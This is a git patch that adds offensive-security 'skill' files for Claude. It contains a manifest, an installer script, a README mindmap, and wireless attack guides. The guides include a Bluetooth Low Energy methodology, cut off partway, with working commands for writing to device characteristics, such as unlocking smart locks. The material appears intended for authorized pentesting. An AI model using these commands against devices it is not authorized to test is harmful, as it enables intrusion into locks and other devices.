"Skills/infrastructure/offensive-advanced-redteam/SKILL.md", + "description": "" + }, + { + "name": "offensive-edr-evasion", + "category": "infrastructure", + "path": "Skills/infrastructure/offensive-edr-evasion/SKILL.md", + "description": "" + }, + { + "name": "offensive-initial-access", + "category": "infrastructure", + "path": "Skills/infrastructure/offensive-initial-access/SKILL.md", + "description": "" + }, + { + "name": "offensive-keylogger-arch", + "category": "infrastructure", + "path": "Skills/infrastructure/offensive-keylogger-arch/SKILL.md", + "description": "" + }, + { + "name": "offensive-shellcode", + "category": "infrastructure", + "path": "Skills/infrastructure/offensive-shellcode/SKILL.md", + "description": "Shellcode development reference for offensive security engagements. Use when writing custom x86/x64 shellcode, implementing position-independent code (PIC), building shellcode loaders, evading AV/EDR detection, or converting PE files to shellcode. Covers null byte avoidance, API hashing, encoder/decoder patterns, staged vs stageless payloads, Windows PEB traversal, and cross-platform shellcode techniques." + }, + { + "name": "offensive-windows-boundaries", + "category": "infrastructure", + "path": "Skills/infrastructure/offensive-windows-boundaries/SKILL.md", + "description": "" + }, + { + "name": "offensive-windows-mitigations", + "category": "infrastructure", + "path": "Skills/infrastructure/offensive-windows-mitigations/SKILL.md", + "description": "" + }, + { + "name": "offensive-iot", + "category": "iot", + "path": "Skills/iot/offensive-iot/SKILL.md", + "description": "IoT and embedded device security testing methodology. Covers hardware reconnaissance (UART, JTAG, SWD, SPI flash, I2C EEPROM, eMMC chip-off), firmware acquisition (vendor portals, OTA capture, flash dump, binwalk extraction), firmware analysis (filesystem mounting, binary triage, hardcoded secrets, default credential discovery), bootloader attacks (U-Boot console, secure-boot bypass, fault injection), runtime attacks on embedded Linux/RTOS (busybox CVEs, MTD writes, /dev/mem), wireless protocol attacks (Zigbee, BLE, Z-Wave, LoRaWAN, Thread/Matter, sub-GHz), MQTT/CoAP/Modbus/BACnet/OPC-UA exploitation, mobile companion app analysis, cloud-IoT API abuse, and side-channel/glitching basics. Use for IoT pentest, smart-home assessment, ICS/OT testing, or embedded vulnerability research." + }, + { + "name": "offensive-mobile", + "category": "mobile", + "path": "Skills/mobile/offensive-mobile/SKILL.md", + "description": "Mobile (Android + iOS) application penetration testing methodology. Covers static analysis (apktool/jadx for Android, class-dump/Hopper/IDA for iOS), dynamic instrumentation with Frida and Objection, SSL pinning bypass strategies, root/jailbreak detection bypass, deep-link / URL-scheme abuse, exported component attacks (Android activities, services, providers, receivers; iOS XPC, URL schemes, universal links), insecure data storage (SharedPrefs, KeyStore misuse, NSUserDefaults, Keychain ACL bypass), IPC / Intent redirection, WebView vulnerabilities (JavaScriptInterface, file:// access), Firebase/AWS/Azure misconfiguration leakage, mobile API testing, biometric/Face ID/Touch ID bypass, app-cloning and runtime patching, and mobile malware/RAT analysis primitives. Use for mobile pentest, bug bounty mobile triage, or app-store reconnaissance." + }, + { + "name": "offensive-osint", + "category": "recon", + "path": "Skills/recon/offensive-osint/SKILL.md", + "description": "Comprehensive OSINT methodology skill for offensive security, red team intelligence gathering, and bug bounty reconnaissance. Covers domain recon, email harvesting, social media profiling, GitHub/code leaks, Shodan/Censys enumeration, breach data lookup, employee profiling, infrastructure mapping, cryptocurrency tracing, geospatial intelligence, and AI-assisted analysis workflows. Use when performing reconnaissance against a target domain or organization, investigating a person or entity, tracing cryptocurrency flows, geolocating images or events, or building an attack-surface map." + }, + { + "name": "offensive-osint-methodology", + "category": "recon", + "path": "Skills/recon/offensive-osint-methodology/SKILL.md", + "description": "" + }, + { + "name": "offensive-fast-checking", + "category": "utility", + "path": "Skills/utility/offensive-fast-checking/SKILL.md", + "description": "" + }, + { + "name": "offensive-reporting", + "category": "utility", + "path": "Skills/utility/offensive-reporting/SKILL.md", + "description": "Penetration test and red team report writing methodology. Covers executive summary structuring (risk-led narrative for non-technical readers), technical finding format (title, severity, affected scope, narrative, reproduction steps, impact, remediation, references), CVSS v3.1 / v4.0 scoring with vector justification, OWASP risk rating, evidence hygiene (redacting credentials, hashing client data, time-stamping every action), screenshot and PoC artifact management, finding chain narratives, scope/limitations/assumptions documentation, retest evidence and remediation tracking, deliverable formats (PDF, DOCX, HTML, JSON for SIEM ingestion), client-customer-deliverable separation, and common report mistakes (over-CVSSing, undermining the triager, missing the 'so what'). Use at the end of an engagement when authoring a deliverable, when restructuring a draft for executive readability, or when establishing a reusable report template for a consulting practice." + }, + { + "name": "offensive-business-logic", + "category": "web", + "path": "Skills/web/offensive-business-logic/SKILL.md", + "description": "Business logic vulnerability testing for web/mobile/API engagements. Covers workflow bypass, state machine violations, multi-step process abuse, price/quantity/discount manipulation, currency confusion, coupon stacking, refund/chargeback abuse, race conditions on logic boundaries, parameter tampering for hidden flows, role/tenant boundary violations, time-of-check vs use, anti-automation defeat, fraud-detection evasion, and subscription/quota abuse. Use when scoping an application after surface-level OWASP Top 10 has been covered, or when the asset is a transactional/marketplace/fintech/e-commerce/SaaS app where logic flaws produce direct financial impact." + }, + { + "name": "offensive-deserialization", + "category": "web", + "path": "Skills/web/offensive-deserialization/SKILL.md", + "description": "" + }, + { + "name": "offensive-file-upload", + "category": "web", + "path": "Skills/web/offensive-file-upload/SKILL.md", + "description": "" + }, + { + "name": "offensive-graphql", + "category": "web", + "path": "Skills/web/offensive-graphql/SKILL.md", + "description": "" + }, + { + "name": "offensive-idor", + "category": "web", + "path": "Skills/web/offensive-idor/SKILL.md", + "description": "" + }, + { + "name": "offensive-open-redirect", + "category": "web", + "path": "Skills/web/offensive-open-redirect/SKILL.md", + "description": "" + }, + { + "name": "offensive-parameter-pollution", + "category": "web", + "path": "Skills/web/offensive-parameter-pollution/SKILL.md", + "description": "" + }, + { + "name": "offensive-race-condition", + "category": "web", + "path": "Skills/web/offensive-race-condition/SKILL.md", + "description": "" + }, + { + "name": "offensive-rce", + "category": "web", + "path": "Skills/web/offensive-rce/SKILL.md", + "description": "" + }, + { + "name": "offensive-request-smuggling", + "category": "web", + "path": "Skills/web/offensive-request-smuggling/SKILL.md", + "description": "" + }, + { + "name": "offensive-sqli", + "category": "web", + "path": "Skills/web/offensive-sqli/SKILL.md", + "description": "SQL injection testing skill for offensive security assessments and bug bounty hunting. Covers error-based, UNION-based, boolean/time-based blind, out-of-band, second-order, NoSQL, GraphQL, WebSocket, and JSON-operator SQLi. Includes WAF bypass techniques, database-specific exploitation (MySQL, MSSQL, PostgreSQL, Oracle), cloud-native attack paths, ORM CVE tracking, and SQLmap automation. Use when performing web application SQL injection testing, database enumeration, privilege escalation via SQLi, or assessing injection vectors in APIs and modern stacks." + }, + { + "name": "offensive-ssrf", + "category": "web", + "path": "Skills/web/offensive-ssrf/SKILL.md", + "description": "" + }, + { + "name": "offensive-ssti", + "category": "web", + "path": "Skills/web/offensive-ssti/SKILL.md", + "description": "" + }, + { + "name": "offensive-waf-bypass", + "category": "web", + "path": "Skills/web/offensive-waf-bypass/SKILL.md", + "description": "" + }, + { + "name": "offensive-xss", + "category": "web", + "path": "Skills/web/offensive-xss/SKILL.md", + "description": "" + }, + { + "name": "offensive-xxe", + "category": "web", + "path": "Skills/web/offensive-xxe/SKILL.md", + "description": "" + }, + { + "name": "offensive-wifi", + "category": "wireless", + "path": "Skills/wireless/offensive-wifi/SKILL.md", + "description": "Wireless / 802.11 attack methodology for red team engagements and wireless security assessments. Covers monitor-mode setup, WPA/WPA2-PSK handshake capture and PMKID attacks, WPA3 SAE downgrade and Dragonblood, WPA-Enterprise (EAP) attacks (MSCHAPv2 cracking, EAP-TLS cert theft, evil-twin RADIUS), Karma / Known Beacons / Mana evil twin attacks, captive-portal phishing, KRACK and FragAttacks, WPS Pixie Dust, deauthentication and disassociation attacks, rogue AP construction (hostapd-mana), 802.1X bypass, MAC randomization defeat, BLE/Zigbee/IEEE 802.15.4 sidebands, and Wi-Fi 6/6E/7 considerations. Use when scoping wireless pentest, war-driving an estate, or testing corporate wireless segmentation." + } + ], + "skill_count": 45, + "category_count": 13 +} diff --git a/install.sh b/install.sh new file mode 100755 index 0000000..2000837 --- /dev/null +++ b/install.sh @@ -0,0 +1,108 @@ +#!/usr/bin/env bash +# claude-red installer +# Copies offensive security skills into a Claude skills directory. +# +# Usage: +# ./install.sh # interactive (asks for target) +# ./install.sh --target ~/.claude/skills # explicit target +# ./install.sh --category web # one category only +# ./install.sh --target DIR --category web # combined +# ./install.sh --list # list available categories +# ./install.sh --dry-run # show what would be copied +# +# Default target: ~/.claude/skills/claude-red + +set -euo pipefail + +SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" +SKILLS_DIR="$SCRIPT_DIR/Skills" +DEFAULT_TARGET="${HOME}/.claude/skills/claude-red" + +TARGET="" +CATEGORY="" +DRY_RUN=0 +LIST_ONLY=0 + +usage() { + sed -n '2,12p' "$0" | sed 's/^# \{0,1\}//' + exit "${1:-0}" +} + +list_categories() { + echo "Available categories:" + for d in "$SKILLS_DIR"/*/; do + [ -d "$d" ] || continue + name=$(basename "$d") + count=$(find "$d" -name SKILL.md | wc -l | tr -d ' ') + printf " %-20s %s skill(s)\n" "$name" "$count" + done +} + +while [ $# -gt 0 ]; do + case "$1" in + --target) TARGET="$2"; shift 2 ;; + --category) CATEGORY="$2"; shift 2 ;; + --dry-run) DRY_RUN=1; shift ;; + --list) LIST_ONLY=1; shift ;; + -h|--help) usage 0 ;; + *) echo "Unknown option: $1" >&2; usage 1 ;; + esac +done + +if [ "$LIST_ONLY" -eq 1 ]; then + list_categories + exit 0 +fi + +if [ ! -d "$SKILLS_DIR" ]; then + echo "Error: Skills directory not found at $SKILLS_DIR" >&2 + exit 1 +fi + +# Interactive prompt if no target given +if [ -z "$TARGET" ]; then + if [ -t 0 ]; then + read -r -p "Install target [$DEFAULT_TARGET]: " TARGET || true + fi + TARGET="${TARGET:-$DEFAULT_TARGET}" +fi + +# Validate category if specified +if [ -n "$CATEGORY" ]; then + if [ ! -d "$SKILLS_DIR/$CATEGORY" ]; then + echo "Error: Category '$CATEGORY' not found." >&2 + echo "" >&2 + list_categories >&2 + exit 1 + fi + SOURCE="$SKILLS_DIR/$CATEGORY" + DEST="$TARGET/$CATEGORY" +else + SOURCE="$SKILLS_DIR" + DEST="$TARGET" +fi + +echo "Source: $SOURCE" +echo "Target: $DEST" +echo + +if [ "$DRY_RUN" -eq 1 ]; then + echo "[dry-run] Would copy:" + find "$SOURCE" -name SKILL.md | sed "s|^$SOURCE| $DEST|" + exit 0 +fi + +mkdir -p "$DEST" + +# Use rsync if available for nicer output, else cp -r +if command -v rsync >/dev/null 2>&1; then + rsync -a --info=stats1 "$SOURCE/" "$DEST/" +else + cp -r "$SOURCE/." "$DEST/" + echo "Copied via cp (install rsync for progress info)." +fi + +skill_count=$(find "$DEST" -name SKILL.md | wc -l | tr -d ' ') +echo +echo "Installed $skill_count skill(s) to $DEST" +echo "Claude should now auto-discover them on next session start." diff --git a/tools/build_manifest.py b/tools/build_manifest.py new file mode 100755 index 0000000..b5536ba --- /dev/null +++ b/tools/build_manifest.py @@ -0,0 +1,91 @@ +#!/usr/bin/env python3 +"""Generate claude-skills.json manifest from Skills/ tree. + +Reads YAML frontmatter from each SKILL.md and emits a compact JSON manifest +of all skills, grouped by category, for tooling that needs a machine-readable +index of the library. +""" +from __future__ import annotations + +import json +import re +import sys +from pathlib import Path + +ROOT = Path(__file__).resolve().parent.parent +SKILLS_DIR = ROOT / "Skills" +OUT = ROOT / "claude-skills.json" + +FRONTMATTER_RE = re.compile(r"^---\n(.*?)\n---", re.DOTALL) + + +def parse_frontmatter(text: str) -> dict: + m = FRONTMATTER_RE.match(text) + if not m: + return {} + block = m.group(1) + out: dict[str, str] = {} + current_key: str | None = None + buf: list[str] = [] + for line in block.splitlines(): + if not line.strip(): + continue + if ":" in line and not line.startswith(" "): + if current_key is not None: + out[current_key] = "\n".join(buf).strip().strip('"') + buf = [] + key, _, val = line.partition(":") + current_key = key.strip() + val = val.strip() + if val: + buf.append(val) + else: + buf.append(line.strip()) + if current_key is not None: + out[current_key] = "\n".join(buf).strip().strip('"') + return out + + +def main() -> int: + if not SKILLS_DIR.is_dir(): + print(f"Error: {SKILLS_DIR} not found", file=sys.stderr) + return 1 + + manifest: dict = { + "name": "claude-red", + "version": "0.2.0", + "license": "MIT", + "homepage": "https://github.com/SnailSploit/claude-red", + "categories": {}, + "skills": [], + } + + for category_dir in sorted(SKILLS_DIR.iterdir()): + if not category_dir.is_dir(): + continue + category = category_dir.name + manifest["categories"][category] = [] + for skill_dir in sorted(category_dir.iterdir()): + skill_md = skill_dir / "SKILL.md" + if not skill_md.is_file(): + continue + fm = parse_frontmatter(skill_md.read_text(encoding="utf-8")) + entry = { + "name": fm.get("name", skill_dir.name), + "category": category, + "path": str(skill_md.relative_to(ROOT)), + "description": fm.get("description", ""), + } + manifest["categories"][category].append(entry["name"]) + manifest["skills"].append(entry) + + manifest["skill_count"] = len(manifest["skills"]) + manifest["category_count"] = len(manifest["categories"]) + + OUT.write_text(json.dumps(manifest, indent=2, ensure_ascii=False) + "\n", encoding="utf-8") + print(f"Wrote {OUT} with {manifest['skill_count']} skills across {manifest['category_count']} categories.") + return 0 + + +if __name__ == "__main__": + raise SystemExit(main()) From c7b211b2a7d84541f1aaad8858b1979921e7cbc4 Mon Sep 17 00:00:00 2001 From: Claude Date: Wed, 6 May 2026 08:09:55 +0000 Subject: [PATCH 4/4] =?UTF-8?q?Phase=203:=20Wireless=20split=20=E2=80=94?= =?UTF-8?q?=2012=20new=20focused=20skills=20(13=20total=20in=20wireless/)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Split the monolithic offensive-wifi into per-surface skills: - offensive-wifi-recon: adapter, monitor mode, multi-band recon - offensive-wpa2-psk: handshake, PMKID, hashcat 22000 - offensive-wpa3-sae: transition downgrade, Dragonblood, SAE - offensive-wpa-enterprise: 802.1X, EAP, eaphammer evil-twin RADIUS - offensive-wps: Pixie Dust, online brute, vendor PIN derivation - offensive-evil-twin: KARMA/Mana, captive portal, post-association MITM - offensive-krack-fragattacks: KRACK + FragAttacks supplicant testing - offensive-deauth-disassoc: deauth tactics, PMF, action frames - offensive-bluetooth-ble: GATT, pairing, MITM, BLE crackle - offensive-bluetooth-classic: BR/EDR, SDP/SPP, KNOB, BlueBorne - offensive-zigbee-thread-matter: KillerBee, Touchlink, ZCL commands - offensive-z-wave: S0/S2, hub pivots - offensive-lorawan-sub-ghz: LoRaWAN ABP/OTAA, KeeLoq, TPMS, sub-GHz Original offensive-wifi retained as category overview/index. README and MINDMAP updated; manifest regenerated (58 skills total). --- MINDMAP.md | 216 +++++++++++++++++ README.md | 21 +- .../wireless/offensive-bluetooth-ble/SKILL.md | 194 +++++++++++++++ .../offensive-bluetooth-classic/SKILL.md | 156 +++++++++++++ .../offensive-deauth-disassoc/SKILL.md | 132 +++++++++++ Skills/wireless/offensive-evil-twin/SKILL.md | 220 ++++++++++++++++++ .../offensive-krack-fragattacks/SKILL.md | 114 +++++++++ .../offensive-lorawan-sub-ghz/SKILL.md | 182 +++++++++++++++ Skills/wireless/offensive-wifi-recon/SKILL.md | 203 ++++++++++++++++ .../offensive-wpa-enterprise/SKILL.md | 207 ++++++++++++++++ Skills/wireless/offensive-wpa2-psk/SKILL.md | 176 ++++++++++++++ Skills/wireless/offensive-wpa3-sae/SKILL.md | 159 +++++++++++++ Skills/wireless/offensive-wps/SKILL.md | 166 +++++++++++++ Skills/wireless/offensive-z-wave/SKILL.md | 146 ++++++++++++ .../offensive-zigbee-thread-matter/SKILL.md | 160 +++++++++++++ claude-skills.json | 95 +++++++- 16 files changed, 2540 insertions(+), 7 deletions(-) create mode 100644 MINDMAP.md create mode 100644 Skills/wireless/offensive-bluetooth-ble/SKILL.md create mode 100644 Skills/wireless/offensive-bluetooth-classic/SKILL.md create mode 100644 Skills/wireless/offensive-deauth-disassoc/SKILL.md create mode 100644 Skills/wireless/offensive-evil-twin/SKILL.md create mode 100644 Skills/wireless/offensive-krack-fragattacks/SKILL.md create mode 100644 Skills/wireless/offensive-lorawan-sub-ghz/SKILL.md create mode 100644 Skills/wireless/offensive-wifi-recon/SKILL.md create mode 100644 Skills/wireless/offensive-wpa-enterprise/SKILL.md create mode 100644 Skills/wireless/offensive-wpa2-psk/SKILL.md create mode 100644 Skills/wireless/offensive-wpa3-sae/SKILL.md create mode 100644 Skills/wireless/offensive-wps/SKILL.md create mode 100644 Skills/wireless/offensive-z-wave/SKILL.md create mode 100644 Skills/wireless/offensive-zigbee-thread-matter/SKILL.md diff --git a/MINDMAP.md b/MINDMAP.md new file mode 100644 index 0000000..a41b359 --- /dev/null +++ b/MINDMAP.md @@ -0,0 +1,216 @@ +# claude-red — Library Mindmap + +A visual map of every skill in the library, by category. Use it to navigate, to discover skills you didn't know existed, and to spot coverage gaps before an engagement. + +References for completeness checking: [MITRE ATT&CK](https://attack.mitre.org/), [HackTricks](https://book.hacktricks.xyz/), [OWASP WSTG](https://owasp.org/www-project-web-security-testing-guide/), [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings). + +--- + +## Library Map + +```mermaid +mindmap + root((claude-red)) + Web + sqli + xss + ssrf + ssti + xxe + idor + file-upload + rce + deserialization + race-condition + request-smuggling + open-redirect + parameter-pollution + graphql + waf-bypass + business-logic + Auth + jwt + oauth + Active-Directory + active-directory + Wireless + wifi + wifi-recon + wpa2-psk + wpa3-sae + wpa-enterprise + wps + evil-twin + krack-fragattacks + deauth-disassoc + bluetooth-ble + bluetooth-classic + zigbee-thread-matter + z-wave + lorawan-sub-ghz + Cloud + cloud + Mobile + mobile + IoT + iot + Infrastructure + initial-access + advanced-redteam + edr-evasion + shellcode + keylogger-arch + windows-mitigations + windows-boundaries + Exploit-Dev + exploit-development + exploit-dev-course + basic-exploitation + crash-analysis + mitigations + toctou + Fuzzing + fuzzing + fuzzing-course + bug-identification + vuln-classes + Recon + osint + osint-methodology + AI + ai-security + Utility + fast-checking + reporting +``` + +--- + +## Coverage Cross-Reference + +Use this table to confirm coverage of common offensive surfaces. If a row has no skill, it's a gap. + +### Web Application (OWASP WSTG) + +| Surface | Skill | +|---|---| +| Information gathering | `recon/offensive-osint`, `recon/offensive-osint-methodology` | +| Configuration / deployment | `web/offensive-waf-bypass` | +| Identity management | `auth/offensive-jwt`, `auth/offensive-oauth` | +| Authentication | _(planned: `web/auth-bypass`)_ | +| Authorization | `web/offensive-idor` | +| Session management | `auth/offensive-jwt`, `auth/offensive-oauth` | +| Input validation | `web/offensive-sqli`, `web/offensive-xss`, `web/offensive-xxe`, `web/offensive-ssti`, `web/offensive-ssrf` | +| Error handling | _(implicit across web skills)_ | +| Cryptography | _(planned)_ | +| Business logic | `web/offensive-business-logic` | +| Client-side | `web/offensive-xss`, `web/offensive-open-redirect` | +| API testing | `web/offensive-graphql` | + +### Internal Network / Active Directory (MITRE ATT&CK Enterprise) + +| Tactic | Skill | +|---|---| +| Reconnaissance | `recon/offensive-osint`, `active-directory/offensive-active-directory` | +| Initial Access | `infrastructure/offensive-initial-access` | +| Execution | `infrastructure/offensive-advanced-redteam` | +| Persistence | `active-directory/offensive-active-directory` | +| Privilege Escalation | `active-directory/offensive-active-directory` | +| Defense Evasion | `infrastructure/offensive-edr-evasion`, `infrastructure/offensive-windows-mitigations`, `infrastructure/offensive-windows-boundaries` | +| Credential Access | `active-directory/offensive-active-directory` | +| Discovery | `recon/offensive-osint`, `active-directory/offensive-active-directory` | +| Lateral Movement | `active-directory/offensive-active-directory`, `infrastructure/offensive-advanced-redteam` | +| Collection | `infrastructure/offensive-advanced-redteam` | +| Command and Control | `infrastructure/offensive-advanced-redteam` | +| Exfiltration | `infrastructure/offensive-advanced-redteam` | +| Impact | `infrastructure/offensive-advanced-redteam` | + +### Wireless + +| Surface | Skill | +|---|---| +| Recon / war-driving | `wireless/offensive-wifi-recon` | +| WPA2-PSK | `wireless/offensive-wifi` | +| WPA3-SAE | `wireless/offensive-wifi` | +| WPA-Enterprise | `wireless/offensive-wifi` | +| WPS | `wireless/offensive-wifi` | +| Evil twin / KARMA / Mana | `wireless/offensive-wifi` | +| KRACK / FragAttacks | `wireless/offensive-wifi` | +| Bluetooth (BLE + Classic) | `wireless/offensive-wifi` | +| Zigbee / Thread / Matter | `wireless/offensive-wifi` | +| Z-Wave | `wireless/offensive-wifi` | +| LoRa / sub-GHz | `wireless/offensive-wifi` | + +### Cloud + +| Provider / Surface | Skill | +|---|---| +| AWS — privesc, IMDS, persistence | `cloud/offensive-cloud` | +| Azure — privesc, IMDS, persistence | `cloud/offensive-cloud` | +| GCP — privesc, IMDS, persistence | `cloud/offensive-cloud` | +| Cross-cloud / OIDC trust | `cloud/offensive-cloud` | +| Hybrid identity (AAD Connect, ADFS) | _(planned: `cloud-identity/`)_ | + +### Mobile + +| Platform / Surface | Skill | +|---|---| +| Android static + dynamic | `mobile/offensive-mobile` | +| iOS static + dynamic | `mobile/offensive-mobile` | +| Firebase / cloud misconfig | `mobile/offensive-mobile` | +| Mobile API testing | `mobile/offensive-mobile` | +| Biometric / pinning bypass | `mobile/offensive-mobile` | + +### IoT / Embedded + +| Layer | Skill | +|---|---| +| Hardware recon | `iot/offensive-iot` | +| UART / JTAG / SWD | `iot/offensive-iot` | +| Flash extraction | `iot/offensive-iot` | +| Firmware analysis | `iot/offensive-iot` | +| Bootloader / secure boot | `iot/offensive-iot` | +| RTOS exploitation | `iot/offensive-iot` | +| ICS / OT protocols | `iot/offensive-iot` | +| MQTT / CoAP | `iot/offensive-iot` | + +### Exploit Development + +| Topic | Skill | +|---|---| +| Beginner / mitigations off | `exploit-dev/offensive-basic-exploitation` | +| Course curriculum | `exploit-dev/offensive-exploit-dev-course` | +| Stack / heap / ROP | `exploit-dev/offensive-exploit-development` | +| Modern mitigations | `exploit-dev/offensive-mitigations` | +| Crash triage | `exploit-dev/offensive-crash-analysis` | +| TOCTOU / race | `exploit-dev/offensive-toctou`, `web/offensive-race-condition` | + +### Fuzzing & Vulnerability Research + +| Topic | Skill | +|---|---| +| Coverage-guided fuzzing | `fuzzing/offensive-fuzzing` | +| Fuzzing curriculum | `fuzzing/offensive-fuzzing-course` | +| Static review patterns | `fuzzing/offensive-bug-identification` | +| Vuln class taxonomy | `fuzzing/offensive-vuln-classes` | + +### AI Security + +| Topic | Skill | +|---|---| +| Prompt injection / jailbreak / RAG | `ai/offensive-ai-security` | + +### Utility + +| Topic | Skill | +|---|---| +| Fast triage checklist | `utility/offensive-fast-checking` | +| Pro pentest reporting | `utility/offensive-reporting` | + +--- + +## How to Use the Mindmap + +- **Pre-engagement:** Walk the relevant category branch and confirm a skill exists per surface in scope. Gaps you spot here are gaps in the engagement plan. +- **During engagement:** Click into the category for the surface you're testing; load only those skills into Claude. +- **Post-engagement:** Cross-check findings against the relevant Mindmap branches to ensure no surface was skipped. diff --git a/README.md b/README.md index cb88c8f..6ce393e 100644 --- a/README.md +++ b/README.md @@ -7,7 +7,7 @@ **Offensive security skills for Claude — drop-in `SKILL.md` files that turn Claude into a context-aware red team operator.** [![License: MIT](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE) -[![Skills](https://img.shields.io/badge/skills-45-red.svg)](#skill-index) +[![Skills](https://img.shields.io/badge/skills-58-red.svg)](#skill-index) [![Categories](https://img.shields.io/badge/categories-13-orange.svg)](#categories) [![Stars](https://img.shields.io/github/stars/SnailSploit/claude-red?style=social)](https://github.com/SnailSploit/claude-red) [![Forks](https://img.shields.io/github/forks/SnailSploit/claude-red?style=social)](https://github.com/SnailSploit/claude-red/network/members) @@ -100,7 +100,7 @@ Paste the contents of a `SKILL.md` into a Project's system prompt or prepend to | [Web Application](#web-application) | 16 | OWASP Top 10 + business logic + advanced web bug classes | | [Auth & Identity](#auth--identity) | 2 | JWT, OAuth | | [Active Directory](#active-directory) | 1 | On-prem AD attack methodology *(expanding)* | -| [Wireless](#wireless) | 1 | 802.11, WPA2/3, EAP, BLE, Zigbee, sub-GHz *(expanding)* | +| [Wireless](#wireless) | 13 | 802.11, WPA2/3, EAP, WPS, evil-twin, BLE, Zigbee, Z-Wave, LoRa, sub-GHz | | [Cloud](#cloud) | 1 | AWS / Azure / GCP attack paths *(expanding)* | | [Mobile](#mobile) | 1 | Android + iOS pentest *(expanding)* | | [IoT & Embedded](#iot--embedded) | 1 | Hardware, firmware, RTOS, ICS *(expanding)* | @@ -163,9 +163,20 @@ Paste the contents of a `SKILL.md` into a Project's system prompt or prepend to | Skill | Description | |---|---| -| [`offensive-wifi`](Skills/wireless/offensive-wifi/SKILL.md) | 802.11 — WPA2/3/EAP, KARMA/Mana, KRACK, WPS, BLE, Zigbee, sub-GHz | - -> **Note:** Being split into 12 focused skills. See [Roadmap](#roadmap). +| [`offensive-wifi`](Skills/wireless/offensive-wifi/SKILL.md) | 802.11 overview — entrypoint into the wireless category | +| [`offensive-wifi-recon`](Skills/wireless/offensive-wifi-recon/SKILL.md) | Adapter selection, monitor mode, multi-band airspace mapping | +| [`offensive-wpa2-psk`](Skills/wireless/offensive-wpa2-psk/SKILL.md) | Handshake capture, PMKID, hashcat 22000 cracking | +| [`offensive-wpa3-sae`](Skills/wireless/offensive-wpa3-sae/SKILL.md) | Transition-mode downgrade, Dragonblood, SAE side-channels | +| [`offensive-wpa-enterprise`](Skills/wireless/offensive-wpa-enterprise/SKILL.md) | 802.1X / EAP attacks, eaphammer evil-twin RADIUS | +| [`offensive-wps`](Skills/wireless/offensive-wps/SKILL.md) | Pixie Dust, online PIN brute, vendor PIN generators | +| [`offensive-evil-twin`](Skills/wireless/offensive-evil-twin/SKILL.md) | KARMA, Mana, captive portal, post-association MITM | +| [`offensive-krack-fragattacks`](Skills/wireless/offensive-krack-fragattacks/SKILL.md) | KRACK + FragAttacks supplicant testing | +| [`offensive-deauth-disassoc`](Skills/wireless/offensive-deauth-disassoc/SKILL.md) | Targeted/broadcast deauth, PMF awareness, action frames | +| [`offensive-bluetooth-ble`](Skills/wireless/offensive-bluetooth-ble/SKILL.md) | BLE GATT enum, pairing downgrade, sniffing, MITM | +| [`offensive-bluetooth-classic`](Skills/wireless/offensive-bluetooth-classic/SKILL.md) | BR/EDR — SDP, SPP, KNOB, BlueBorne, HID spoofing | +| [`offensive-zigbee-thread-matter`](Skills/wireless/offensive-zigbee-thread-matter/SKILL.md) | 802.15.4 mesh — KillerBee, Touchlink abuse, ZCL command injection | +| [`offensive-z-wave`](Skills/wireless/offensive-z-wave/SKILL.md) | S0 key derivation flaw, S2 commissioning, hub pivots | +| [`offensive-lorawan-sub-ghz`](Skills/wireless/offensive-lorawan-sub-ghz/SKILL.md) | LoRaWAN ABP/OTAA, KeeLoq garage doors, fixed-code, TPMS | ### Cloud diff --git a/Skills/wireless/offensive-bluetooth-ble/SKILL.md b/Skills/wireless/offensive-bluetooth-ble/SKILL.md new file mode 100644 index 0000000..e81d3e8 --- /dev/null +++ b/Skills/wireless/offensive-bluetooth-ble/SKILL.md @@ -0,0 +1,194 @@ +--- +name: offensive-bluetooth-ble +description: "Bluetooth Low Energy (BLE) attack methodology — GATT enumeration, characteristic read/write without auth, pairing downgrade (Just Works forced), LE Secure Connections bypass, MITM via active relay, sniffing with Sniffle (TI CC1352) / Ubertooth / Frontline, encryption key extraction (LE Legacy Pairing crackable, LE Secure Connections strong), proximity authentication abuse (cars, locks), and companion-app trust analysis. Use for IoT BLE devices, smart locks, fitness trackers, medical devices, BLE beacons, or any device pairing over BLE." +--- + +# Bluetooth Low Energy (BLE) Attacks + +BLE devices communicate via GATT — a hierarchy of services, characteristics, and descriptors. Many devices treat the BLE link itself as the trust boundary, exposing privileged operations on characteristics readable/writable from any nearby device. + +## Quick Workflow + +1. Discover and enumerate the device's GATT tree +2. Test every characteristic for read/write/notify without authentication +3. Inspect pairing method — Just Works = no MITM protection +4. If Just Works, MITM the pairing to capture / inject +5. Reverse the companion app for proprietary command formats + +--- + +## Discovery + GATT Enumeration + +```bash +# bettercap (interactive) +sudo bettercap -eval "ble.recon on; events.show 60; ble.show" + +# Or, attach to a known-MAC device +sudo bettercap -eval "ble.recon on; ble.enum AA:BB:CC:DD:EE:FF" + +# bluetoothctl +bluetoothctl +> scan on +> connect AA:BB:CC:DD:EE:FF +> menu gatt +> list-attributes + +# gatttool (deprecated but still works) +gatttool -b AA:BB:CC:DD:EE:FF -I +> connect +> primary # list services +> char-desc # list characteristics +> char-read-uuid +> char-write-req +``` + +GATT services use 16-bit UUIDs for SIG-defined services (battery, heart rate) and 128-bit UUIDs for vendor-defined ones. Custom 128-bit UUIDs are where vendor-specific commands live — that's your attack surface. + +## Characteristic Auth-Free Read/Write + +Test every characteristic flagged read/write/notify: + +```bash +# Read all readable characteristics +for h in $(gatttool -b --primary | awk '{print $5}'); do + echo "=== Handle $h ===" + gatttool -b --char-read --handle=$h +done + +# Write to writable characteristics with crafted values +gatttool -b --char-write-req --handle=0x0010 --value=0x01 +``` + +Common findings on consumer BLE devices: +- Door locks: `unlock` characteristic accepts any write (no auth) +- Smart bulbs: brightness/color writeable from any peer +- Wearables: PIN/lock-state readable +- BLE beacons: configurable from any peer (rebrand attacks) + +## Pairing Method Identification + +```bash +# Bluetoothctl shows pairing method on initial pair attempt +bluetoothctl +> pair AA:BB:CC:DD:EE:FF +# Watch for: "Confirm passkey", "Display passkey", or no prompt = Just Works +``` + +| Method | Security | Attack | +|---|---|---| +| Just Works | None — authenticates anything | Trivial MITM during pairing | +| Numeric Comparison | User confirms 6-digit code | UI manipulation only; crypto strong | +| Passkey Entry | 6-digit code entered or displayed | Brute attack on passkey crackable in some pairing variants | +| Out of Band (OOB) | NFC / QR exchange | Out of scope for BLE attacker | + +**LE Legacy Pairing** uses TK derivation that's crackable from a captured pairing exchange. **LE Secure 